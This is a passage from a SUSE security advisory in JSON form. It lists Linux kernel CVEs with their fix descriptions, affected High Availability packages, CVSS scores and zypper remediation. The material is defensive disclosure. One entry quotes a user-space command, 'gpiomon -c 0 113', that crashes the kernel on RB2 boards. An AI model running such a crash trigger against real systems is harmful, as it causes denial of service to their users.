"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: zd1211rw: Fix potential NULL pointer dereference in zd_mac_tx_to_dev()\n\nThere is a potential NULL pointer dereference in zd_mac_tx_to_dev(). For\nexample, the following is possible:\n\n \tT0\t\t\t \t\tT1\nzd_mac_tx_to_dev()\n /* len == skb_queue_len(q) */\n while (len \u003e ZD_MAC_MAX_ACK_WAITERS) {\n\n\t\t\t\t\t filter_ack()\n\t\t\t\t\t spin_lock_irqsave(\u0026q-\u003elock, flags);\n\t\t\t\t\t /* position == skb_queue_len(q) */\n\t\t\t\t\t for (i=1; i\u003cposition; i++)\n\t\t\t\t \t skb = __skb_dequeue(q)\n\n\t\t\t\t\t if (mac-\u003etype == NL80211_IFTYPE_AP)\n\t\t\t\t\t skb = __skb_dequeue(q);\n\t\t\t\t\t spin_unlock_irqrestore(\u0026q-\u003elock, flags);\n\n skb_dequeue() -\u003e NULL\n\nSince there is a small gap between checking skb queue length and skb being\nunconditionally dequeued in zd_mac_tx_to_dev(), skb_dequeue() can return NULL.\nThen the pointer is passed to zd_mac_tx_status() where it is dereferenced.\n\nIn order to avoid potential NULL pointer dereference due to situations like\nabove, check if skb is not NULL before passing it to zd_mac_tx_status().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38513",
"url": "https://www.suse.com/security/cve/CVE-2025-38513"
},
{
"category": "external",
"summary": "SUSE Bug 1248179 for CVE-2025-38513",
"url": "https://bugzilla.suse.com/1248179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38513"
},
{
"cve": "CVE-2025-38515",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38515"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Increment job count before swapping tail spsc queue\n\nA small race exists between spsc_queue_push and the run-job worker, in\nwhich spsc_queue_push may return not-first while the run-job worker has\nalready idled due to the job count being zero. If this race occurs, job\nscheduling stops, leading to hangs while waiting on the job\u0027s DMA\nfences.\n\nSeal this race by incrementing the job count before appending to the\nSPSC queue.\n\nThis race was observed on a drm-tip 6.16-rc1 build with the Xe driver in\nan SVM test case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38515",
"url": "https://www.suse.com/security/cve/CVE-2025-38515"
},
{
"category": "external",
"summary": "SUSE Bug 1248212 for CVE-2025-38515",
"url": "https://bugzilla.suse.com/1248212"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38515"
},
{
"cve": "CVE-2025-38516",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38516"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: qcom: msm: mark certain pins as invalid for interrupts\n\nOn some platforms, the UFS-reset pin has no interrupt logic in TLMM but\nis nevertheless registered as a GPIO in the kernel. This enables the\nuser-space to trigger a BUG() in the pinctrl-msm driver by running, for\nexample: `gpiomon -c 0 113` on RB2.\n\nThe exact culprit is requesting pins whose intr_detection_width setting\nis not 1 or 2 for interrupts. This hits a BUG() in\nmsm_gpio_irq_set_type(). Potentially crashing the kernel due to an\ninvalid request from user-space is not optimal, so let\u0027s go through the\npins and mark those that would fail the check as invalid for the irq chip\nas we should not even register them as available irqs.\n\nThis function can be extended if we determine that there are more\ncorner-cases like this.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38516",
"url": "https://www.suse.com/security/cve/CVE-2025-38516"
},
{
"category": "external",
"summary": "SUSE Bug 1248209 for CVE-2025-38516",
"url": "https://bugzilla.suse.com/1248209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38516"
},
{
"cve": "CVE-2025-38520",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38520"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdkfd: Don\u0027t call mmput from MMU notifier callback\n\nIf the process is exiting, the mmput inside mmu notifier callback from\ncompactd or fork or numa balancing could release the last reference\nof mm struct to call exit_mmap and free_pgtable, this triggers deadlock\nwith below backtrace.\n\nThe deadlock will leak kfd process as mmu notifier release is not called\nand cause VRAM leaking.\n\nThe fix is to take mm reference mmget_non_zero when adding prange to the\ndeferred list to pair with mmput in deferred list work.\n\nIf prange split and add into pchild list, the pchild work_item.mm is not\nused, so remove the mm parameter from svm_range_unmap_split and\nsvm_range_add_child.\n\nThe backtrace of hung task:\n\n INFO: task python:348105 blocked for more than 64512 seconds.\n Call Trace:\n __schedule+0x1c3/0x550\n schedule+0x46/0xb0\n rwsem_down_write_slowpath+0x24b/0x4c0\n unlink_anon_vmas+0xb1/0x1c0\n free_pgtables+0xa9/0x130\n exit_mmap+0xbc/0x1a0\n mmput+0x5a/0x140\n svm_range_cpu_invalidate_pagetables+0x2b/0x40 [amdgpu]\n mn_itree_invalidate+0x72/0xc0\n __mmu_notifier_invalidate_range_start+0x48/0x60\n try_to_unmap_one+0x10fa/0x1400\n rmap_walk_anon+0x196/0x460\n try_to_unmap+0xbb/0x210\n migrate_page_unmap+0x54d/0x7e0\n migrate_pages_batch+0x1c3/0xae0\n migrate_pages_sync+0x98/0x240\n migrate_pages+0x25c/0x520\n compact_zone+0x29d/0x590\n compact_zone_order+0xb6/0xf0\n try_to_compact_pages+0xbe/0x220\n __alloc_pages_direct_compact+0x96/0x1a0\n __alloc_pages_slowpath+0x410/0x930\n __alloc_pages_nodemask+0x3a9/0x3e0\n do_huge_pmd_anonymous_page+0xd7/0x3e0\n __handle_mm_fault+0x5e3/0x5f0\n handle_mm_fault+0xf7/0x2e0\n hmm_vma_fault.isra.0+0x4d/0xa0\n walk_pmd_range.isra.0+0xa8/0x310\n walk_pud_range+0x167/0x240\n walk_pgd_range+0x55/0x100\n __walk_page_range+0x87/0x90\n walk_page_range+0xf6/0x160\n hmm_range_fault+0x4f/0x90\n amdgpu_hmm_range_get_pages+0x123/0x230 [amdgpu]\n amdgpu_ttm_tt_get_user_pages+0xb1/0x150 [amdgpu]\n init_user_pages+0xb1/0x2a0 [amdgpu]\n amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu+0x543/0x7d0 [amdgpu]\n kfd_ioctl_alloc_memory_of_gpu+0x24c/0x4e0 [amdgpu]\n kfd_ioctl+0x29d/0x500 [amdgpu]\n\n(cherry picked from commit a29e067bd38946f752b0ef855f3dfff87e77bec7)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38520",
"url": "https://www.suse.com/security/cve/CVE-2025-38520"
},
{
"category": "external",
"summary": "SUSE Bug 1248217 for CVE-2025-38520",
"url": "https://bugzilla.suse.com/1248217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38520"
},
{
"cve": "CVE-2025-38521",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38521"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/imagination: Fix kernel crash when hard resetting the GPU\n\nThe GPU hard reset sequence calls pm_runtime_force_suspend() and\npm_runtime_force_resume(), which according to their documentation should\nonly be used during system-wide PM transitions to sleep states.\n\nThe main issue though is that depending on some internal runtime PM\nstate as seen by pm_runtime_force_suspend() (whether the usage count is\n\u003c= 1), pm_runtime_force_resume() might not resume the device unless\nneeded. If that happens, the runtime PM resume callback\npvr_power_device_resume() is not called, the GPU clocks are not\nre-enabled, and the kernel crashes on the next attempt to access GPU\nregisters as part of the power-on sequence.\n\nReplace calls to pm_runtime_force_suspend() and\npm_runtime_force_resume() with direct calls to the driver\u0027s runtime PM\ncallbacks, pvr_power_device_suspend() and pvr_power_device_resume(),\nto ensure clocks are re-enabled and avoid the kernel crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38521",
"url": "https://www.suse.com/security/cve/CVE-2025-38521"
},
{
"category": "external",
"summary": "SUSE Bug 1248232 for CVE-2025-38521",
"url": "https://bugzilla.suse.com/1248232"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-38521"
},
{
"cve": "CVE-2025-38529",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38529"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: aio_iiro_16: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 0xdcfc) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38529",
"url": "https://www.suse.com/security/cve/CVE-2025-38529"
},
{
"category": "external",
"summary": "SUSE Bug 1248196 for CVE-2025-38529",
"url": "https://bugzilla.suse.com/1248196"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
